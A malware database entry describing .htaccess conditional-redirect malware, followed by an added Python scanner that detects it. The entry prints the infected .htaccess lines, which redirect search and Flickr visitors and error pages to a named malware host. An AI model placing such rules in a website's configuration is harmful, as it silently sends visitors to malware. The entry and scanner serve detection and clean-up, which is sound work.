Description:
This attack uses .htaccess to redirect users to a site serving malware (or spam).
Loads malware from:
http://redrt.org.in
And other domains.
Affecting:
Any type of web site (no specific target).
Clean up and details:
Remove offending code from .htaccess.
Links:
http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html
Malware sample:
..
RewriteCond %{HTTP_REFERER} .flickr. [NC,OR]
RewriteCond %{HTTP_REFERER} .yahoo.$ [NC]
RewriteRule .* http://redrt.org.in/in.cgi?4&parameter=0510 [R,L]
ErrorDocument 400 http://redrt.org.in/in.cgi?4&parameter=0510
ErrorDocument 401 http://redrt.org.in/in.cgi?4&parameter=0510
ErrorDocument 403 http://redrt.org.in/in.cgi?4&parameter=0510
ErrorDocument 404 http://redrt.org.in/in.cgi?4&parameter=0510
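
Detection example (added here, not part of the original write-up or any Sucuri tool): a Python check that flags the two traits visible in the sample, a RewriteRule to an off-site URL guarded by HTTP_REFERER conditions, and ErrorDocument directives pointing at an off-site URL. The names scan_htaccess, external_host and own_hosts, and the host malicious.example, are assumptions made for this example.

```python
import re
from urllib.parse import urlparse

# Constructed sample modelled on the pattern above; "malicious.example"
# is a placeholder host, not a real indicator.
SAMPLE = """RewriteEngine On
RewriteCond %{HTTP_REFERER} .*flickr.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://malicious.example/in.cgi?4 [R,L]
ErrorDocument 404 http://malicious.example/in.cgi?4
ErrorDocument 403 /errors/403.html
RewriteCond %{HTTP_HOST} ^example.com$ [NC]
RewriteRule ^(.*)$ http://www.example.com/$1 [R=301,L]
"""

URL = re.compile(r"https?://[^\s\"']+", re.I)

def external_host(line, own_hosts):
    """Host of the directive's target (third token) if it is an off-site URL."""
    parts = line.split()
    m = URL.search(parts[2]) if len(parts) >= 3 else None
    host = (urlparse(m.group(0)).hostname or "").lower() if m else ""
    return host if host and host not in own_hosts else None

def scan_htaccess(text, own_hosts=()):
    """Return (line number, finding, host) tuples for suspicious directives."""
    own = {h.lower() for h in own_hosts}
    findings, referer_cond = [], False
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        directive = line.split()[0].lower()
        if directive == "rewritecond":
            # Remember whether any condition in this run inspects the Referer.
            referer_cond = referer_cond or "%{http_referer}" in line.lower()
        elif directive == "rewriterule":
            host = external_host(line, own)
            if host and referer_cond:
                findings.append((lineno, "referer-conditional redirect", host))
            referer_cond = False  # conditions bind only to the next RewriteRule
        elif directive == "errordocument":
            host = external_host(line, own)
            if host:
                findings.append((lineno, "external ErrorDocument", host))
    return findings

if __name__ == "__main__":
    for finding in scan_htaccess(SAMPLE):
        print(finding)
```

Pass the site's own hostnames in own_hosts so that legitimate absolute-URL error pages are not reported; the canonical-host redirect at the end of the sample is not flagged because its condition tests HTTP_HOST rather than the referer.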